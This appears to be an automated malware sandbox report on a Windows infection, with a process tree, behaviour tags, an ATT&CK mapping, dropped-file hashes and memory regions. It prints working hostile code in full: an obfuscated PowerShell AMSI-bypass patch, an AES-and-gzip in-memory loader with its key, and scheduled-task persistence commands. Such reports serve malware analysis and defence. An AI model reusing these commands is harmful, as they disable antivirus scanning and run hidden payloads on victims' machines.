$_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+'em'+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'')}).GetType('M'+[Char](105)+'c'+[Char](114)+'o'+'s'+''+'o'+''+'f'+''+'t'+''+'.'+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+''+[Char](78)+''+'a'+'t'+[Char](105)+'v'+'e'+''+[Char](77)+''+'e'+''+'t'+''+'h'+''+'o'+''+[Char](100)+''+'s'+'');$gSyKWgjeRyzpeP=$mGfvhHBBeXvaI.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](80)+''+'r'+''+'o'+''+'c'+'A'+[Char](100)+'d'+[Char](114)+''+[Char](101)+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+',St'+'a'+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RsmJWItBUAXpAsVcDrq=serRBHKKBDGS @([String])([IntPtr]);$ItKjOjUXDKaRxfnulRrsnT=serRBHKKBDGS @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JtcDdSilxOx=$mGfvhHBBeXvaI.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+'o'+'d'+'u'+'l'+''+'e'+'H'+[Char](97)+'n'+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$DGDGcQwEvxvcCE=$gSyKWgjeRyzpeP.Invoke($Null,@([Object]$JtcDdSilxOx,[Object]('L'+[Char](111)+''+'a'+'d'+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$XrVBEnfIYMvmDAbEj=$gSyKWgjeRyzpeP.Invoke($Null,@([Object]$JtcDdSilxOx,[Object](''+[Char](86)+''+'i'+'r'+'t'+''+'u'+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+'o'+[Char](116)+''+'e'+''+'c'+'t')));$UvzSVDQ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DGDGcQwEvxvcCE,$RsmJWItBUAXpAsVcDrq).Invoke(''+[Char](97)+'ms'+'i'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$kYKHwPNHgcPkfkmlP=$gSyKWgjeRyzpeP.Invoke($Null,@([Object]$UvzSVDQ,[Object]('A'+[Char](109)+'si'+[Char](83)+'c'+'a'+''+'n'+'B'+[Char](117)+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$gzjlmXVIyg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XrVBEnfIYMvmDAbEj,$ItKjOjUXDKaRxfnulRrsnT).Invoke($kYKHwPNHgcPkfkmlP,[uint32]8,4,[ref]$gzjlmXVIyg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kYKHwPNHgcPkfkmlP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XrVBEnfIYMvmDAbEj,$ItKjOjUXDKaRxfnulRrsnT).Invoke($kYKHwPNHgcPkfkmlP,[uint32]8,0x20,[ref]$gzjlmXVIyg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+'t'+''+[Char](97)+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1164

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1228

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1400

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:2836

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1540

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1852

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1880

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1052

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1980

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2056

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2192

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2256

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2592

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2852

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3088

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:568

C:\Windows\system32\net.exe
net file
3⤵
- Suspicious use of WriteProcessMemory
PID:412

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 file
4⤵
PID:4032

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('91jdUL03S+qtiKcnEbLxlX2v4V+KQpEPutZBqgO8E2Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rx59Q5ZvoQCkoSKd0BimNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UBcWZ=New-Object System.IO.MemoryStream(,$param_var); $DoLTg=New-Object System.IO.MemoryStream; $PYnBX=New-Object System.IO.Compression.GZipStream($UBcWZ, [IO.Compression.CompressionMode]::Decompress); $PYnBX.CopyTo($DoLTg); $PYnBX.Dispose(); $UBcWZ.Dispose(); $DoLTg.Dispose(); $DoLTg.ToArray();}function execute_function($param_var,$param2_var){ $MrGmk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KybaH=$MrGmk.EntryPoint; $KybaH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$yfjds=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($pdwUJ in $yfjds) { if ($pdwUJ.StartsWith(':: ')) { $TDafT=$pdwUJ.Substring(3); break; }}$payloads_var=[string[]]$TDafT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2812

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_212_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_212.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4948

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_212.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:4716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_212.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:1220

C:\Windows\SysWOW64\net.exe
net file
6⤵
- Suspicious use of WriteProcessMemory
PID:2412

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 file
7⤵
PID:1520

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('91jdUL03S+qtiKcnEbLxlX2v4V+KQpEPutZBqgO8E2Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rx59Q5ZvoQCkoSKd0BimNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UBcWZ=New-Object System.IO.MemoryStream(,$param_var); $DoLTg=New-Object System.IO.MemoryStream; $PYnBX=New-Object System.IO.Compression.GZipStream($UBcWZ, [IO.Compression.CompressionMode]::Decompress); $PYnBX.CopyTo($DoLTg); $PYnBX.Dispose(); $UBcWZ.Dispose(); $DoLTg.Dispose(); $DoLTg.ToArray();}function execute_function($param_var,$param2_var){ $MrGmk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KybaH=$MrGmk.EntryPoint; $KybaH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_212.bat';$yfjds=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_212.bat').Split([Environment]::NewLine);foreach ($pdwUJ in $yfjds) { if ($pdwUJ.StartsWith(':: ')) { $TDafT=$pdwUJ.Substring(3); break; }}$payloads_var=[string[]]$TDafT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5020

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:3064

C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe
"C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe"
7⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1004

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:1356

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
7⤵
- Executes dropped EXE
PID:3812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3460

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3832

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3896

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:4020

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4420

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3172

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:2496

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:3004

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:4592

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4560

C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:1184

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3372

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

Scheduled Task/Job

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Subvert Trust Controls

1

T1553

Install Root Certificate

Modify Registry

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
5dc9a9599fb11ee70f9164d8fea15abf

SHA1
85faf41a206f3fa8b469609333558cf817df2cda

SHA256
3f033142ed64a5d1e1e19d11a710e22a32827e98922769497ed6bd6e452e44de

SHA512
499407006c53a5f8e5b2b00dab734613762e66a9080504ab50d21e4c8a32b75d7308ccaa0cecfbeb7058044448a40912715da1f02ec72994596d567b515dcfca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
17KB

MD5
1e4e7795327c95ed3beb3f011a4596d7

SHA1
4fa407c07aeedf34a55e6ff08935cb71afa11496

SHA256
cd78b6b0f1d7e2c13439b466bfa00e992c774ba5335f90bb616557298c193282

SHA512
dea17b69d0aa0e943eb005a2cbc9a8e29edff37a4b815f90bfe396a6271c027c352afbae1e484cc4ad90f6e40165dc8f89daebf5f39e3bcf27c5393642fdc519

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dblcuafh.fn2.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\install.exe
Filesize
162KB

MD5
152e3f07bbaf88fb8b097ba05a60df6e

SHA1
c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

SHA256
a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

SHA512
2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

Download Submit
C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe
Filesize
411KB

MD5
bc4535f575200446e698610c00e1483d

SHA1
78d990d776f078517696a2415375ac9ebdf5d49a

SHA256
88e1993beb7b2d9c3a9c3a026dc8d0170159afd3e574825c23a34b917ca61122

SHA512
a9b4197f86287076a49547c8957c0a33cb5420bf29078b3052dc0b79808e6b5e65c6d09bb30ab6d522c51eb4b25b3fb1e3f3692700509f20818cfcc75b250717

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_212.bat
Filesize
515KB

MD5
4c2a3be3d5c9464eb441677e41f44fd8

SHA1
c826034a0882d21a39056d745e88622ee9698343

SHA256
45e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7

SHA512
ccf12f0e439393f4fef5531ef89a62411feeaed9d7f0751e9e4c5fb366d1cd0059a11e0a12002b851ff138701f69d65ce7ad69f1bcb6e3944481311311c8f27c

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_212.vbs
Filesize
115B

MD5
1eca98cf5780cf222d7eec0fb8789ae4

SHA1
ede80058e543dc3346c371183273277d4821b21f

SHA256
dbea5a630c3a6f2bd856a3dacb5e935fe517ef75f8439a8bad172a5343aa3229

SHA512
6430f17a271b964b305ee230cab6067d58389d152a1433a6098e17b3d8ffbf3fdfeceacd3a447a68badd6e0ac96c2fe244f9b6e23ffdd75e8c5eb456cca82ab3

Download Submit
memory/428-160-0x000002BC21150000-0x000002BC2117B000-memory.dmp

Filesize
172KB

Download
memory/428-161-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp

Filesize
64KB

Download
memory/428-154-0x000002BC21150000-0x000002BC2117B000-memory.dmp

Filesize
172KB

Download
memory/536-165-0x000002576AF90000-0x000002576AFBB000-memory.dmp

Filesize
172KB

Download
memory/608-119-0x0000023A09C50000-0x0000023A09C75000-memory.dmp

Filesize
148KB

Download
memory/608-120-0x0000023A09C80000-0x0000023A09CAB000-memory.dmp

Filesize
172KB

Download
memory/608-121-0x0000023A09C80000-0x0000023A09CAB000-memory.dmp

Filesize
172KB

Download
memory/608-127-0x0000023A09C80000-0x0000023A09CAB000-memory.dmp

Filesize
172KB

Download
memory/608-128-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp

Filesize
64KB

Download
memory/688-139-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp

Filesize
64KB

Download
memory/688-138-0x000001ACDF5C0000-0x000001ACDF5EB000-memory.dmp

Filesize
172KB

Download
memory/688-132-0x000001ACDF5C0000-0x000001ACDF5EB000-memory.dmp

Filesize
172KB

Download
memory/980-143-0x000001F02B5D0000-0x000001F02B5FB000-memory.dmp

Filesize
172KB

Download
memory/980-150-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp

Filesize
64KB

Download
memory/980-149-0x000001F02B5D0000-0x000001F02B5FB000-memory.dmp

Filesize
172KB

Download
memory/1004-95-0x0000000006A60000-0x0000000006AA6000-memory.dmp

Filesize
280KB

Download
memory/1172-115-0x00007FFFCE9E0000-0x00007FFFCEA9D000-memory.dmp

Filesize
756KB

Download
memory/1172-111-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1172-113-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1172-114-0x00007FFFCF4E0000-0x00007FFFCF6E9000-memory.dmp

Filesize
2.0MB

Download
memory/1172-110-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1172-109-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1172-108-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1172-116-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1904-107-0x00007FFFCE9E0000-0x00007FFFCEA9D000-memory.dmp

Filesize
756KB

Download
memory/1904-106-0x00007FFFCF4E0000-0x00007FFFCF6E9000-memory.dmp

Filesize
2.0MB

Download
memory/1904-105-0x00000256D5440000-0x00000256D546A000-memory.dmp

Filesize
168KB

Download
memory/1904-96-0x00000256D50B0000-0x00000256D50D2000-memory.dmp

Filesize
136KB

Download
memory/2812-73-0x0000000075160000-0x0000000075911000-memory.dmp

Filesize
7.7MB

Download
memory/2812-23-0x00000000098F0000-0x0000000009E96000-memory.dmp

Filesize
5.6MB

Download
memory/2812-1-0x0000000005140000-0x0000000005176000-memory.dmp

Filesize
216KB

Download
memory/2812-3-0x0000000005900000-0x0000000005F2A000-memory.dmp

Filesize
6.2MB

Download
memory/2812-2-0x0000000075160000-0x0000000075911000-memory.dmp

Filesize
7.7MB

Download
memory/2812-0-0x000000007516E000-0x000000007516F000-memory.dmp

Filesize
4KB

Download
memory/2812-4-0x0000000075160000-0x0000000075911000-memory.dmp

Filesize
7.7MB

Download
memory/2812-5-0x0000000005720000-0x0000000005742000-memory.dmp

Filesize
136KB

Download
memory/2812-7-0x0000000005F30000-0x0000000005F96000-memory.dmp

Filesize
408KB

Download
memory/2812-6-0x00000000057C0000-0x0000000005826000-memory.dmp

Filesize
408KB

Download
memory/2812-16-0x0000000005FE0000-0x0000000006337000-memory.dmp

Filesize
3.3MB

Download
memory/2812-17-0x00000000064F0000-0x000000000650E000-memory.dmp

Filesize
120KB

Download
memory/2812-18-0x0000000006570000-0x00000000065BC000-memory.dmp

Filesize
304KB

Download
memory/2812-19-0x0000000007CC0000-0x000000000833A000-memory.dmp

Filesize
6.5MB

Download
memory/2812-20-0x0000000007640000-0x000000000765A000-memory.dmp

Filesize
104KB

Download
memory/2812-21-0x0000000002B60000-0x0000000002B68000-memory.dmp

Filesize
32KB

Download
memory/2812-22-0x0000000007730000-0x0000000007792000-memory.dmp

Filesize
392KB

Download
memory/4948-50-0x0000000006E90000-0x0000000006E9A000-memory.dmp

Filesize
40KB

Download
memory/4948-49-0x0000000075160000-0x0000000075911000-memory.dmp

Filesize
7.7MB

Download
memory/4948-26-0x0000000075160000-0x0000000075911000-memory.dmp

Filesize
7.7MB

Download
memory/4948-27-0x0000000075160000-0x0000000075911000-memory.dmp

Filesize
7.7MB

Download
memory/4948-37-0x0000000071350000-0x000000007139C000-memory.dmp

Filesize
304KB

Download
memory/4948-47-0x0000000075160000-0x0000000075911000-memory.dmp

Filesize
7.7MB

Download
memory/4948-48-0x0000000006B20000-0x0000000006BC4000-memory.dmp

Filesize
656KB

Download
memory/4948-46-0x0000000006040000-0x000000000605E000-memory.dmp

Filesize
120KB

Download
memory/4948-36-0x0000000006AE0000-0x0000000006B14000-memory.dmp

Filesize
208KB

Download
memory/4948-25-0x0000000075160000-0x0000000075911000-memory.dmp

Filesize
7.7MB

Download
memory/4948-55-0x0000000075160000-0x0000000075911000-memory.dmp

Filesize
7.7MB

Download
memory/4948-51-0x00000000070A0000-0x0000000007136000-memory.dmp

Filesize
600KB

Download
memory/4948-52-0x0000000007030000-0x0000000007041000-memory.dmp

Filesize
68KB

Download
memory/5020-75-0x0000000007990000-0x0000000007A22000-memory.dmp

Filesize
584KB

Download
memory/5020-74-0x00000000053F0000-0x000000000545C000-memory.dmp

Filesize
432KB

Download
memory/5020-77-0x0000000007C80000-0x0000000007CBC000-memory.dmp

Filesize
240KB

Download
memory/5020-76-0x0000000007910000-0x0000000007922000-memory.dmp

Filesize
72KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads